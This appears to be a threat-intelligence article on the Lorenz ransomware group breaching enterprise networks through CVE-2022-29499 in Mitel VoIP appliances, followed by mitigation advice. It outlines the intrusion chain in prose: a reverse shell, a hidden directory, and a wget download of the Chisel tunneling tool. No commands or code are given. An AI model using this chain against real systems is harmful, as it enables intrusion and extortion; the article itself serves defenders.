Lorenz Ransomware Group Exploits Phone Systems To Breach Enterprise Networks

The Lorenz Ransomware Group has been actively targeting enterprise organizations worldwide since December 2020, utilizing various methods to breach corporate networks and extort hefty ransoms. Their latest approach involves exploiting vulnerabilities in Mitel VOIP Appliances, specifically the CVE-2022-29499 vulnerability. By gaining unauthorized access through these appliances, the group establishes a reverse shell and employs the TCP tunneling tool Chisel to enhance their attack capabilities. These actions put over 19,000 devices at risk, compromising the security of critical sectors that rely on Mitel VoIP products. The Lorenz gang has been identified with a high level of confidence as the perpetrators of these incidents. To mitigate the risk, recommended measures include upgrading to MiVoice Connect Version R19.3, regularly scanning external appliances and web applications, avoiding direct exposure of critical assets to the internet, configuring PowerShell logging, and implementing off-site logging. Additionally, prioritizing regular backups, implementing secure web filtering solutions, and implementing measures to minimize the impact of potential attacks are essential.

Key Takeaways

• Lorenz Ransomware Group has been targeting enterprise organizations worldwide since December 2020 and demands victims to pay a ransom of hundreds of thousands of dollars.
• The group uses Mitel VOIP Appliances to access corporate networks and exploits the CVE-2022-29499 vulnerability to gain initial access.
• The gang downloads the TCP tunneling tool Chisel from Github via wget and uses it to enhance their capabilities in attacking critical sectors.
• Enterprises using Mitel VoIP products are at risk, and it is recommended to upgrade to MiVoice Connect Version R19.3, perform regular scanning of external appliances and web applications, and implement measures like network segmentation and secure web filtering to limit the impact of potential attacks.

Lorenz Ransomware Group

The Lorenz Ransomware Group has been targeting enterprise organizations worldwide since December 2020, demanding large ransom payments and selling stolen data to other threat actors, while also leveraging the same encryptor as ThunderCrypt and exploiting the Mitel VOIP Appliances to gain access to corporate networks. This group poses a significant threat to global enterprise networks, with potential financial losses resulting from their ransom demands. Moreover, the sale of stolen data puts the affected organizations at risk of further exploitation. To protect phone systems from ransomware attacks, it is crucial to implement effective strategies. Regular scanning of external appliances and web applications, upgrading to the latest MiVoice Connect Version, and avoiding direct exposure of critical assets to the internet are recommended. Additionally, configuring PowerShell logging, implementing off-site logging, and ensuring secure and offline storage of backups can enhance data protection. Network segmentation, access control, and secure web filtering solutions are also vital in mitigating the impact of such attacks.

Mitel VOIP Appliances

Mitel VOIP Appliances are utilized by threat actors to gain unauthorized access to corporate networks. This poses a significant risk to enterprises worldwide. The impact of vulnerabilities in Mitel appliances on enterprise networks cannot be underestimated. It is crucial for organizations to implement Mitel VoIP security best practices to protect their networks from exploitation.

To address this issue, here are three important considerations:

1. Regular Updates and Patches: Organizations should ensure that their Mitel appliances are running the latest firmware and security patches. This helps to mitigate the risk of known vulnerabilities being exploited.

2. Network Segmentation: Implementing network segmentation can help limit the blast radius of an attack. By separating critical systems from less sensitive ones, organizations can minimize the potential impact of a breach.

3. Access Control: Applying the principle of least privilege is essential. Restricting user access to Mitel appliances and regularly reviewing and updating access controls can help prevent unauthorized access.

By following these Mitel VoIP security best practices, enterprises can enhance their network security and protect against potential breaches.

Vulnerability Exploitation

Vulnerability exploitation serves as the initial method for gaining unauthorized access to corporate networks. In the case of the Lorenz Ransomware Group’s breach of enterprise networks, the CVE-2022-29499 vulnerability was specifically targeted. This vulnerability allowed the group to exploit Mitel VOIP appliances, which played a significant role in the breach. By leveraging this vulnerability, the Lorenz gang was able to establish a reverse shell and pivot into the environment using the TCP tunneling tool Chisel. This breach has had a significant impact on critical sectors worldwide, as Mitel VOIP products are widely used in these sectors. The compromised security of enterprises has led to potential financial losses from ransom demands, as well as the sale of stolen data to control victims and for profit.

Mitel Device Command Line Interface

Utilizing the command line interface of the targeted Mitel devices, the threat actors of the recent breach were able to create a hidden directory and download the compiled binary of the Chisel tool from Github, thereby enhancing their capabilities in attacking critical sectors. This highlights the vulnerabilities in Mitel device management and the potential risks associated with their command line interface. By exploiting these vulnerabilities, the Lorenz ransomware group gained unauthorized access to enterprise networks, enabling them to carry out their malicious activities. The command line interface allowed the threat actors to execute commands and download the Chisel tool, which facilitated TCP tunneling and further exploitation of the compromised networks. This incident underscores the importance of regularly assessing and addressing vulnerabilities in device management interfaces to mitigate the risk of similar breaches in the future.

Risk and Impact

The recent breach of enterprise networks highlights the significant risk and potential impact associated with the compromised command line interface of targeted devices. Enterprises face potential financial losses due to the demands for ransom payment by the Lorenz ransomware group. The stolen data, which includes sensitive information, is sold to control victims and for profit. To mitigate these risks, it is crucial for organizations to prioritize stolen data protection. Implementing secure web filtering solutions can help block malicious websites and downloads, while regular scanning of external appliances and web applications can identify vulnerabilities. Additionally, enterprises should emphasize the importance of regular backups and implement backup solutions for critical data. Testing backup and recovery processes periodically and ensuring backups are stored securely and offline are essential components of a comprehensive backup strategy.

Frequently Asked Questions

How does the Lorenz Ransomware Group gain initial access to enterprise networks?

The Lorenz ransomware group gains initial access to enterprise networks by exploiting the CVE-2022-29499 vulnerability in Mitel VOIP appliances. Steps to mitigate the risk of a Lorenz gang attack include upgrading to MiVoice Connect Version R19.3 and regularly scanning external appliances and web applications.

What specific vulnerability does the Lorenz gang exploit to access Mitel VOIP Appliances?

The Lorenz gang exploits a specific vulnerability in Mitel VoIP appliances to gain access to enterprise networks. This vulnerability is related to voIP vulnerabilities and is utilized by the gang as part of their ransomware operations.

How does the Mitel Device Command Line Interface play a role in the Lorenz gang’s attack strategy?

The Mitel device command line interface plays a crucial role in the Lorenz gang’s attack strategy. It enables them to create hidden directories, download the Chisel tool from Github, and use Mitel devices for TCP tunneling, enhancing their capabilities in attacking critical sectors.

What are the potential financial losses for enterprises affected by the Lorenz Ransomware Group?

The potential financial impact for enterprises affected by the Lorenz ransomware group includes the cost of remediation, such as paying the ransom demand and implementing security measures to prevent future attacks. These expenses can amount to significant financial losses for the affected organizations.

What are the recommended steps to mitigate the risk of a Lorenz gang attack on enterprise networks?

Mitigating Lorenz gang attacks on enterprise networks requires implementing best practices for network security. These include upgrading to the latest software version, regularly scanning external appliances and web applications, avoiding direct exposure of critical assets to the internet, configuring PowerShell logging, and implementing off-site logging for improved data protection. Additionally, organizations should emphasize the importance of regular backups, implement secure backup solutions for critical data, test backup and recovery processes periodically, store backups securely and offline, and develop a comprehensive backup strategy. Measures to limit the impact of potential attacks should also be implemented, such as segregating networks, restricting access privileges, implementing network segmentation and firewall rules, using least privilege principles for user access, and regularly reviewing and updating access controls. Secure web filtering solutions should be implemented to block malicious websites and downloads, monitor and filter internet traffic for threats, and enhance network security.